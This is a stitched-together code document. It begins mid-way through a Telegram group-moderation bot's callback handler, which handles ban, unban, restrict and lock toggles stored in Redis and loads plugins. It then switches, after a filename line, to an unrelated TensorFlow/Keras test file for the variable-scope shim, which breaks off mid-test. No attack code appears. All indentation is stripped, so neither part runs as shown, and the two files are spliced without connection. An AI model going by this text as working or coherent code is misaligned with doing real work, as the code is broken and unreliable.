reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "listCH":
if int(date[1]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
if date[0] == "listCH-res":
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[1]))})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[1]))})
if date[0] == 'LU-res':
d = date[1].split("-")
lock = d[0]
lockres = d[0]+":"+d[1]
if redis.sismember("{}Nbot:{}".format(BOT_ID,lockres),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,lockres),chatID)
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,lockres),chatID)
redis.sadd("{}Nbot:{}".format(BOT_ID,lock),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[3]))})
if date[0] == 'LU':
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
save = redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
else:
save = redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
if int(date[3]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
if date[0] == "delListblockTEXTs":
redis.delete("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListbans":
arrays = redis.smembers("{}Nbot:{}:bans".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":user})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListrestricteds":
arrays = redis.smembers("{}Nbot:{}:restricteds".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": user,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "LandU":
if date[3] == "LtoU":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[3] == "UtoL":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Corder":
if date[1] == "bans":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("kickChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[1] == "restricteds":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 0,"can_send_media_messages": 0,"can_send_other_messages": 0,"can_send_polls": 0,"can_change_info": 0,"can_add_web_page_previews": 0,"can_pin_messages": 0,})
redis.sadd("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delList":
H = date[1]
if H != "sudos" and H != "creator" and H != "asudos":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "sudos" or H == "asudo":
redis.delete("{}Nbot:{}".format(BOT_ID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id})
elif int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
|
variable_scope_shim_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
import gc
import threading
from absl.testing import parameterized
import numpy
from tensorflow.python.framework import test_util
from keras import combinations
from keras import regularizers
from keras.engine import input_layer as input_layer_module
from keras.engine import training as training_module
from keras.layers import core
from keras.legacy_tf_layers import core as core_layers
from keras.legacy_tf_layers import variable_scope_shim
from tensorflow.python.ops import variable_scope
def run_inside_wrap_function_in_eager_mode(graph_function):
"""Decorator to execute the same graph code in eager and graph modes.
In graph mode, we just execute the graph_function passed as argument. In eager
mode, we wrap the function using wrap_function and then execute the wrapped
result.
Args:
graph_function: python function containing graph code to be wrapped
Returns:
decorated function
"""
def wrap_and_execute(self):
store = variable_scope_shim._EagerVariableStore()
with variable_scope.with_variable_store(store):
# use the original function
graph_function(self)
return wrap_and_execute
class VariableScopeTest(tf.test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertIs(v, v1)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertIs(v, v1)
self.assertIsNot(v, vs.get_variable("u", [1], reuse=False))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set(v.name for v in vs._vars.values()))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Expected tf.group() expected Tensor arguments not 'None' with
# type '<type 'NoneType'>'
@test_util.run_in_graph_and_eager_modes
def testVarScopeInitializer(self):
init = tf.compat.v1.constant_initializer(0.3)
with tf.compat.v1.variable_scope("tower0") as tower:
with tf.compat.v1.variable_scope("foo", initializer=init):
v = tf.compat.v1.get_variable("v", [])
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with tf.compat.v1.variable_scope(tower, initializer=init):
w = tf.compat.v1.get_variable("w", [])
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with tf.compat.v1.variable_scope("tower1") as tower:
with tf.compat.v1.variable_scope("foo", constraint=constraint):
v = tf.compat.v1.get_variable("v", [])
self.assertIsNotNone(v.constraint)
with tf.compat.v1.variable_scope(tower, constraint=constraint):
w = tf.compat.v1.get_variable("w", [])
self.assertIsNotNone(w.constraint)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeDType(self):
with tf.compat.v1.variable_scope("tower2") as tower:
with tf.compat.v1.variable_scope("foo", dtype=tf.float16):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, tf.float16)
with tf.compat.v1.variable_scope(tower, dtype=tf.float16):
w = tf.compat.v1.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, tf.float16)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitFromNonTensorValue(self):
v = tf.compat.v1.get_variable("v4", initializer=4, dtype=tf.int32)
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = tf.compat.v1.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=tf.int64)
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if tf.executing_eagerly() else TypeError
with self.assertRaises(error):
tf.compat.v1.get_variable("x4", initializer={})
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitFromNonInitializer(self):
# Test various dtypes with zeros initializer as following:
types = [
tf.int8, tf.uint8, tf.int16, tf.uint16, tf.int32,
tf.int64, tf.bool
]
# Use different variable_name to distinguish various dtypes
for (i, dtype) in enumerate(types):
x = tf.compat.v1.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = tf.compat.v1.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=tf.compat.v1.zeros_initializer(dtype=dtype))
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeRegularizer(self):
init = tf.compat.v1.constant_initializer(0.3)
def regularizer1(v):
return tf.reduce_mean(v) + 0.1
def regularizer2(v):
return tf.reduce_mean(v) + 0.2
with tf.compat.v1.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with tf.compat.v1.variable_scope("foo", initializer=init):
v = tf.compat.v1.get_variable("v", [])
self.evaluate(tf.compat.v1.variables_initializer([v]))
with tf.compat.v1.variable_scope(tower, initializer=init) as vs:
tf.compat.v1.get_variable("u", [])
vs.set_regularizer(regularizer2)
tf.compat.v1.get_variable("w", [])
# Next 3 variable not regularized to test disabling regularization.
tf.compat.v1.get_variable(
"x", [], regularizer=tf.compat.v1.no_regularizer)
with tf.compat.v1.variable_scope(
"baz", regularizer=tf.compat.v1.no_regularizer):
tf.compat.v1.get_variable("y", [])
vs.set_regularizer(tf.compat.v1.no_regularizer)
tf.compat.v1.get_variable("z", [])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitializeFromValue(self):
init = tf.constant(0.1)
w = tf.compat.v1.get_variable("v", initializer=init)
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegex(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
tf.compat.v1.get_variable("u", [1], initializer=init)
with tf.compat.v1.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = tf.compat.v1.get_variable("v")
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = tf.constant(1, dtype=tf.int32)
t = tf.compat.v1.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, tf.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegex(ValueError, "don't match"):
tf.compat.v1.get_variable("s", initializer=init, dtype=tf.float64)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuse(self):
with self.cached_session():
def test_value(value):
x = tf.constant(value)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=tf.compat.v1.AUTO_REUSE):
_ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=tf.compat.v1.AUTO_REUSE):
_ = tf.compat.v1.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuseIgnoreFalse(self):
with self.cached_session():
def test_value(value):
x = tf.constant(value)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=False):
_ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
# We need to ignore reuse=False in the shim, because the
# code is expected to get rerun each time the user calls the shim.
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=False):
_ = tf.compat.v1.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScope(self):
with self.cached_session():
with tf.name_scope("testVarOpScope1"):
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "tower/w:0")
with tf.name_scope("testVarOpScope2"):
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default_1/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.cached_session():
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesWithJump(self):
with self.cached_session():
with tf.compat.v1.variable_scope("default") as default:
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/layer/w:0")
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"default/layer_1/w:0")
with tf.compat.v1.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"default/layer_2/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuse(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True) as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetVar(self):
with self.cached_session():
with tf.compat.v1.variable_scope("root"):
with tf.compat.v1.variable_scope("towerA") as tower_a:
va = tf.compat.v1.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with tf.compat.v1.variable_scope(tower_a, reuse=True):
va2 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va2, va)
with tf.compat.v1.variable_scope("towerB"):
vb = tf.compat.v1.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with tf.compat.v1.variable_scope("towerA", reuse=True):
va2 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va2, va)
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with tf.compat.v1.variable_scope(tower_a, reuse=True):
va3 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va, va3)
with self.assertRaises(ValueError) as exc:
with tf.compat.v1.variable_scope(tower_a, reuse=True):
tf.compat.v1.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with tf.compat.v1.variable_scope(tower_a, reuse=True):
tf.compat.v1.get_variable("v", [1], dtype=tf.int32)
self.assertEqual("dtype" in str(exc.exception), True)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
pass
with tf.compat.v1.variable_scope(outer):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestedOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope(outer):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseParam(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer) as outer:
with tf.compat.v1.variable_scope("tower", "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
outer.reuse_variables()
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseError(self):
with self.cached_session():
with self.assertRaises(ValueError):
with tf.compat.v1.variable_scope(None, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
pass
with tf.compat.v1.variable_scope(outer, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
outer.reuse_variables()
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeNestedOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope(outer, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with tf.compat.v1.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "scope/w:0")
with tf.compat.v1.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name, "scope/w1:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name, "outer/inner/w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with tf.compat.v1.variable_scope(
None, default_name="default", auxiliary_name_scope=False):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/w:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
None, default_name="default",
auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
root_scope = tf.compat.v1.get_variable_scope()
with tf.compat.v1.variable_scope(
root_scope, auxiliary_name_scope=False):
self.assertEqual(tf.compat.v1.get_variable("w", []).name, "w:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(tf.compat.v1.get_variable("w1", []).name, "w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAuxiliaryNameScopeIsInvalid(self):
with self.cached_session():
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with tf.compat.v1.variable_scope("scope") as scope:
pass
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReuseScopeWithoutNameScopeCollision(self):
# Github issue: #13429
with self.cached_session():
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope("inner") as inner:
pass
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with tf.name_scope(scope.original_name_scope):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")
with tf.compat.v1.variable_scope("another"):
